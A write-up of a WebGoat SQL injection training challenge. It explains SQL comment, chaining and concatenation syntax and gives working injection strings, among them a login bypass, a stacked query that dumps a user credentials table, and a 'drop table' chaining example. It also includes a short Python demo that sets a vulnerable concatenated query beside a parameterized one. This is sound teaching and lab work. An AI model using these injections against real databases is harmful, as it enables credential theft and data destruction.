# [ Webgoat - 3 ] SQL Injection (advanced) - 3
## Problem:

**Try It! Pulling data from other tables**
Let's try to exploit a join to another table. One of the tables in the WebGoat database is:
```
CREATE TABLE user_system_data (userid int not null primary key,
user_name varchar(12),
password varchar(10),
cookie varchar(30));
```
**6.a) Execute a query to union or join these tables.**
**6.b) When you have figured it out…. What is Dave’s password?**

---
## Solution:
### SQL syntax:
```
/* */ are inline comments
-- , # are line comments
Example: Select * from users where name = 'admin' --and pass = 'pass'
```
/* */ marks a multi-line comment in SQL.
-- and # mark single-line comments in SQL.
<font color="BLUE">In the example, everything after the `--` in `--and pass = 'pass'` is not executed.</font>
```
; allows query chaining
Example: Select * from users; drop table users;
```
; chains SQL statements together.
<font color="BLUE">In the example, Select * from users runs first, followed by drop table users.</font>
```
',+,|| allows string concatenation
Char() strings without quotes
Example: Select * from users where name = '+char(27) or 1=1
```
<font color="BLUE">This example mainly shows how to concatenate strings in SQL.</font>
**This challenge only gives the code that creates the table, not the code that processes the input.**
**So when the input-processing code is unknown, the single-line comment is important, because it makes everything after `--` be ignored.**
**Example:**
*strSQL = "SELECT * FROM users WHERE name =' -name- ' AND password = ' -password-'"*
Normal login : Select * from users where name = 'admin' and password = 'pass'
SQL injection : admin'and 1 or 1 --
----> Select * from users where name = 'admin'and 1 or 1 -- ('AND password = '....)
----> Login successful
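As an added example (not from the WebGoat lesson or this note), the string-concatenation pattern assumed above is run beside a parameterized version against a constructed in-memory copy of the quoted table; the rows, values and function names are made up for the demonstration.

```python
import sqlite3

# Constructed in-memory copy of the table quoted in the challenge.
SCHEMA = """
CREATE TABLE user_system_data (userid int not null primary key,
user_name varchar(12),
password varchar(10),
cookie varchar(30));
"""
# Constructed sample rows; the values are placeholders, not WebGoat's data.
ROWS = [
    (1, "dave", "example1", "cookie-a"),
    (2, "jeff", "example2", "cookie-b"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO user_system_data VALUES (?, ?, ?, ?)", ROWS)
    return conn


def login_vulnerable(conn, name, password):
    """The concatenation pattern the note assumes: strSQL = "... '" + name + "' ..."."""
    sql = ("SELECT user_name FROM user_system_data WHERE user_name = '" + name
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, name, password):
    """Same lookup with bound parameters: the input is data, never SQL text."""
    sql = "SELECT user_name FROM user_system_data WHERE user_name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


if __name__ == "__main__":
    db = make_db()
    # A '--' in the name field comments out the whole password check.
    print(login_vulnerable(db, "dave' --", "wrong"))  # ['dave']
    print(login_safe(db, "dave' --", "wrong"))        # []
```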
### Answer:
3. (1)
Question 1:

The query that looks up the account is presumably:
==Select user_name from user_system_data where user_name = '$name';==
<font color="RED">Injection:</font>
`';Select * from user_system_data-- `
<font color="RED">Query after injection: </font>
==Select user_name from user_system_data where user_name = '';Select * from user_system_data--;==
<font color="RED">Injection successful!</font>

(2) 123456

###### tags: `webgoat` `SQL Injection` `CTF`